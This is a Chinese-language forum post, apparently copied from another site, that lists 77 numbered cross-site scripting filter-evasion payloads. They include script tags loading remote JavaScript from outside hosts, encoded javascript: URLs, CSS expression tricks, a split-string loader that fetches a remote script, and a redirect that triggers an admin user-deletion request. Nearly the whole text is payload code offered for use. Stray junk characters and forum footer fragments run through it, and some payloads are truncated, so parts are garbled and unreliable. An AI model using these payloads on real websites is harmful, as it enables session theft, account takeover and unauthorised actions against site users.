貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
! k- c* N" p0 W. J(1)普通的XSS JavaScript注入) U2 O9 H5 a& w3 i* a/ A# H- K
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
7 G2 n- H1 {0 u! B(2)IMG标签XSS使用JavaScript命令
# s; p0 \ C4 d8 @( P6 j<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
1 n' A0 k7 i/ \' H0 V/ h5 v(3)IMG标签无分号无引号+ B1 U7 I c1 p7 Z5 V1 { A
<IMG SRC=javascript:alert(‘XSS’)>
/ e" h0 B4 C* j, S& b(4)IMG标签大小写不敏感
. h) d* }& U4 u" t8 \- C/ S<IMG SRC=JaVaScRiPt:alert(‘XSS’)>: s- v2 T+ S1 C, E; T! ~
(5)HTML编码(必须有分号)* a. s$ a% T$ _( }) B* A, [# s
<IMG SRC=javascript:alert(“XSS”)>
9 R' L2 S- M; \# @0 A& ?# Z5 ~8 Y(6)修正缺陷IMG标签
5 z% e0 i5 y# {+ R: V6 A<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
$ M2 n# D. i9 Q: m# p2 ~1 M2 ]' @3 L; I( w
4 g; x1 |3 g6 T(7)formCharCode标签(计算器)
3 p0 Q5 _1 R( X! z<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>% j+ k7 Z& D* d
(8)UTF-8的Unicode编码(计算器)
! Y4 \) U3 e' Q4 X<IMG SRC=jav..省略..S')>, G1 t$ s" j: B* |. b" Q( \ d
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
' q& K+ b( _2 Y$ o; W<IMG SRC=jav..省略..S')>
, }: l @+ z! `8 h- ](10)十六进制编码也是没有分号(计算器)) b! o% U3 N8 y5 V3 f
<IMG SRC=java..省略..XSS')>
4 M: V" [- Z; @, K1 L4 q(11)嵌入式标签,将Javascript分开
& f1 i; L5 M+ a/ ~$ ^<IMG SRC=”jav ascript:alert(‘XSS’);”>
$ H* z! I: s* x% r" l! c. j9 C# H(12)嵌入式编码标签,将Javascript分开
( l1 T6 Q3 P/ G<IMG SRC=”jav ascript:alert(‘XSS’);”>$ l) Z0 s/ `2 p+ a/ [
(13)嵌入式换行符( B1 l1 b+ g1 r8 ~
<IMG SRC=”jav ascript:alert(‘XSS’);”>- k: k7 e' O" I5 ~
(14)嵌入式回车
, ^+ x! Y6 B! @% b<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 E- ^7 s# ]5 s(15)嵌入式多行注入JavaScript,这是XSS极端的例子( m# {3 Z- s6 E% r4 _* V: I
<IMG SRC=”javascript:alert(‘XSS‘)”>
' e: g0 z7 A1 `1 n6 \6 _9 N(16)解决限制字符(要求同页面)
) P. I/ C3 Z& G8 J<script>z=’document.’</script> a1 j" a9 [! y, |& p9 B" @
<script>z=z+’write(“‘</script>5 a* l3 w* B( Q* m
<script>z=z+’<script’</script>, j: f% H# m- p; \# |8 F( p
<script>z=z+’ src=ht’</script>
/ j9 o/ G+ s1 K+ e% K5 i" T<script>z=z+’tp://ww’</script>
' u9 }* t: X" d6 d<script>z=z+’w.shell’</script>
8 R; j- ?; S6 Z# u x" l<script>z=z+’.net/1.’</script>
: W9 j+ I5 X# U<script>z=z+’js></sc’</script>5 a6 h8 L) j. G5 M0 L
<script>z=z+’ript>”)’</script>6 s9 @. s9 f V6 |0 u
<script>eval_r(z)</script>
- v3 w# l0 J; f1 D! b7 M(17)空字符12-7-1 T00LS - Powered by Discuz! Board
! r! I% d& H! Q# yhttps://www.t00ls.net/viewthread ... table&tid=15267 2/6/ q' Y+ `& C# J9 F& H
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out/ u( \* ?; ?; g+ k: w- S
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
) P' N+ A$ @' D3 w' nperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
: Y$ D$ T6 V( H(19)Spaces和meta前的IMG标签
( c% G9 k9 V( b<IMG SRC=” javascript:alert(‘XSS’);”>2 ]3 H% l- A( L1 Y/ }& r' l
(20)Non-alpha-non-digit XSS
3 l7 d0 ?/ L- q, v' l<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
) N5 h' u. z, `$ R/ b5 R4 `(21)Non-alpha-non-digit XSS to 2
8 p% A' j% }0 D/ | q$ r" T<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>/ j, W8 \; Q+ d; f8 {' S
(22)Non-alpha-non-digit XSS to 34 T [* e' k& I
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>/ } n+ O- q, e2 I! l$ X
(23)双开括号
; v6 P& m" A0 m, B" l<<SCRIPT>alert(“XSS”);//<</SCRIPT>
" w. z1 d& T* }3 b0 e; `" i(24)无结束脚本标记(仅火狐等浏览器)
* c R" f8 Y/ k( j/ l/ j7 G; T<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>! p6 r& n. T- _! f0 S
(25)无结束脚本标记2
0 U/ ]! K4 K" ~<SCRIPT SRC=//3w.org/XSS/xss.js>7 F7 S1 r2 ]/ q! i, n# `2 u
(26)半开的HTML/JavaScript XSS/ C! X o+ X0 a& v5 }+ C7 @7 l
<IMG SRC=”javascript:alert(‘XSS’)”* u' k! C& ], U, d/ X
(27)双开角括号
7 D6 E( R0 P( d" i+ b$ M<iframe src=http://3w.org/XSS.html <* d1 V) v0 c$ ?/ j/ l8 _
(28)无单引号 双引号 分号
' S& G& d2 b6 _' `<SCRIPT>a=/XSS/- E; Q5 ?. |! n
alert(a.source)</SCRIPT>
2 |" ^" m6 G1 T& ], |. S. G* M(29)换码过滤的JavaScript
( c6 M$ h9 g5 J\”;alert(‘XSS’);//( |& s: {+ l- ^/ K9 Z
(30)结束Title标签
7 _0 Q$ [' M! B* ~" m; v5 Y) K1 B</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>3 D5 P0 M& y. x* {) p) t: L5 ~
(31)Input Image
8 L5 G( F& V d5 D& j- q<INPUT SRC=”javascript:alert(‘XSS’);”>7 R# y8 t+ J4 N% N' B) q
(32)BODY Image
( k, _( ~) w7 Z5 L$ J4 t- g, @' o<BODY BACKGROUND=”javascript:alert(‘XSS’)”>; Q# j( m" c) G4 M3 P' Q# B K
(33)BODY标签. Z; A) [9 [0 a; |4 e
<BODY(‘XSS’)>- k f9 q! c% @. l
(34)IMG Dynsrc9 e% A2 e: r9 \- ~) l, D0 F
<IMG DYNSRC=”javascript:alert(‘XSS’)”>3 ~7 u3 {* N; v" \+ B" K
(35)IMG Lowsrc/ Y' J& P- s. M' ?8 z
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
% v# p/ p# y( d2 R$ h5 l& M# b+ w(36)BGSOUND& }. c; C5 w+ Y) X2 F# k Y
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
* T2 K; Q) l% z. k L& O(37)STYLE sheet
6 e) Y& K' Q8 N- P( U; {+ @<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>; n0 G! c2 Q$ @2 a
(38)远程样式表
& `0 s* E3 ~! h% G0 \4 w<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>' U, O4 O: ]) O( B
(39)List-style-image(列表式)9 s% Y9 l! x" ]5 Z: H. K2 B
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
6 P( d4 G W- j# U. e(40)IMG VBscript. G0 P/ M; Z* v: J, ?% Q
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS, A* O3 q' B- N9 N! ?
(41)META链接url% o+ i5 K+ k' [
0 c: O \! J: K3 N% T0 B$ G. V- A" m! }- K7 \
<META HTTP-EQUIV=”refresh” CONTENT=”0;8 f+ D3 U* a, Z! g. r ~, L
URL=http://;URL=javascript:alert(‘XSS’);”>7 f/ J J9 y: @& \) ~4 ~9 |- `) W
(42)Iframe
) u7 g0 |) H% K2 `6 z1 F2 Q<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
2 `4 f9 Z0 u, w% }+ E" ](43)Frame
3 Z; j/ I7 Q0 G: f" t<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
: \: g! d3 E, Chttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
: A; {. `+ |" m* _* q; z(44)Table
$ ^7 i2 w$ ~1 r<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
; }- Y7 p8 E" p. L- d2 Z8 a% h(45)TD
$ X; `0 A3 K& y; n2 G$ F<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
* q! x1 Y; [* @9 _' }7 h0 S8 _7 h% v- O(46)DIV background-image
& e# c, v& C$ U# z5 R5 p# ~<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
, k" `( T9 k/ V% ^(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-2 @, l' z' f+ h7 g/ u# [, M
8&13&12288&65279)
- S& b2 j6 W7 c+ e) y<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>, f+ l( L7 Q& q7 m7 G! z# X, p
(48)DIV expression/ H H) A1 O* A3 f% x; o% O+ N
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
5 d+ p" I% E% G5 i(49)STYLE属性分拆表达- O. c4 t/ d$ w5 |
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
6 Y9 A! c' Z: n1 B2 D! s& O+ c- Z2 _(50)匿名STYLE(组成:开角号和一个字母开头)* x: f* x( @+ N% j/ D; H
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
; M& b( C0 s6 u: w) N(51)STYLE background-image
& @& i! ?/ q0 ?/ R3 Y2 G2 ^$ A5 \ x<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A! T4 j3 Q; n; z& B1 m; s6 a. m% a2 H
CLASS=XSS></A>
4 [6 E! `( { k(52)IMG STYLE方式
8 \3 m" V6 Y" S; G& d4 \9 rexppression(alert(“XSS”))’># z" E2 k1 d8 c; |
(53)STYLE background* V u0 e6 P- E& v, r5 }& _) t$ Q- z
<STYLE><STYLE* r2 D, I( g7 _' z, n" G
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>% L; u0 ^- c5 J2 ~$ V1 i
(54)BASE
+ y3 |; I* p( S8 e: D! M, U<BASE HREF=”javascript:alert(‘XSS’);//”>
" d; k) g3 @ D. }, ]2 ~( I5 F(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS* L9 X4 \3 f' H7 D
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
$ g: a5 o* o+ g4 u) k6 j. @, Y# x(56)在flash中使用ActionScrpt可以混进你XSS的代码5 }. H y! N% \2 J: N
a=”get”;
$ p- K( r- h' g1 F" s& vb=”URL(\”";
6 p7 H5 m: ]/ H% M. L. x8 D2 R6 Rc=”javascript:”;
) N$ r2 `% V) {d=”alert(‘XSS’);\”)”;( ^, b/ {# _9 [: a
eval_r(a+b+c+d);) Q+ P9 a% e3 l# Y
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
8 C5 }% H% v, P; y- m+ x# S8 d<HTML xmlns:xss>
6 L: z% P! I, h( L<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
& b2 m5 N) t1 e- n6 j9 b+ z' _1 s+ q<xss:xss>XSS</xss:xss>+ h- G4 C; F. S1 S i, j) ]: S9 d
</HTML>* {& v0 K8 `# r R' k
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用/ c' a# L1 b: J
<SCRIPT SRC=””></SCRIPT>- q! ^6 m. o* P% p, p
(59)IMG嵌入式命令,可执行任意命令8 |, w- c& G( R* n& g8 G' _' p
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
$ l3 g* {9 w; w1 F/ t' C(60)IMG嵌入式命令(a.jpg在同服务器)# o7 h( ]5 h/ r3 H& X& t5 B- U
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser* B1 N! } e( E4 t3 W4 b
(61)绕符号过滤
# G$ j5 W. n( d<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
' z# m9 m e+ U& ?(62): |' W7 |. q) h* ~- v* l
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
9 y3 E" T6 q! @6 W8 g$ t' c% q(63)
& N" J/ O S2 L& z. M<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>2 z+ e6 W" H5 |
(64)
0 U+ i- l0 t, |( c% i<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT># q( s; h* V3 h; X5 N1 C
(65)/ Z* t2 b; m5 n) F
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>. {8 _* t2 O/ u" i
(66)12-7-1 T00LS - Powered by Discuz! Board
1 j7 N3 m6 E" x: n8 x" [+ C% V' x! bhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
' o% z! |" H- P3 K: |<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>% ]/ X$ W- U6 @: c0 K
(67)
- Z7 e k3 @$ x$ t( X9 d2 M<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>$ D- n7 n. m7 L. B. D0 l
</SCRIPT>: t9 k% B: {/ D0 S4 b
(68)URL绕行
$ y U* T- H0 R<A HREF=”http://127.0.0.1/”>XSS</A>8 j. J! J2 l9 y. K6 C3 y# Z
(69)URL编码, |. f0 q- |8 Z: b7 e* l1 I1 D
<A HREF=”http://3w.org”>XSS</A>
W$ s( I. h' Q2 ?(70)IP十进制
+ V8 P/ Q' B; U5 ^# p+ I7 r<A HREF=”http://3232235521″>XSS</A>- S- `$ S9 @& j) X4 W0 ]1 W* O" I
(71)IP十六进制( G- Q* D( g+ |4 L* S- f
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
7 a8 M% E9 E: m) h: I(72)IP八进制. [/ A2 W% J, g, ]( a
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
9 b. O4 h: Y6 J2 r- }' y0 s(73)混合编码( \" o5 j; j C4 t$ o4 w8 [% y0 N
<A HREF=”h
: S) s/ }& n7 I* y4 g% V0 h' ]9 X) `tt p://6 6.000146.0×7.147/”">XSS</A>* C6 ]- l8 T0 G9 v- x
(74)节省[http:]
8 M6 J, }& M$ I/ k8 K<A HREF=”//www.google.com/”>XSS</A>
& B$ g- a8 [8 k' h$ ^$ j(75)节省[www]% t9 Z$ h4 }+ Z+ U7 r5 p
<A HREF=”http://google.com/”>XSS</A>) ^* P8 g. z6 [3 N/ ~& Z0 `
(76)绝对点绝对DNS# x* a8 n, I: q9 ]% V; v
<A HREF=”http://www.google.com./”>XSS</A>
5 D3 q9 W* O( @) ?% O(77)javascript链接. w; M3 w2 f0 h1 B7 U* W
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>" L" s. E/ {$ c
) d) k9 ]4 v1 _ M2 i原文地址:http://fuzzexp.org/u/0day/?p=14" W D+ R* o! E4 c& c8 Y( o2 @
. D. s6 U9 V+ R0 E, s( Y2 q- M' h |